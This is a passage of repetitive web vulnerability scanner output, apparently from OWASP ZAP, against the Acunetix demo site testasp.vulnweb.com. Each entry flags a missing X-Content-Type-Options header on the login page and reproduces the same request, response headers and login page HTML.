</body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=10 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=11 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=12 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=13 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=14 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=15 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=16 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=17 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
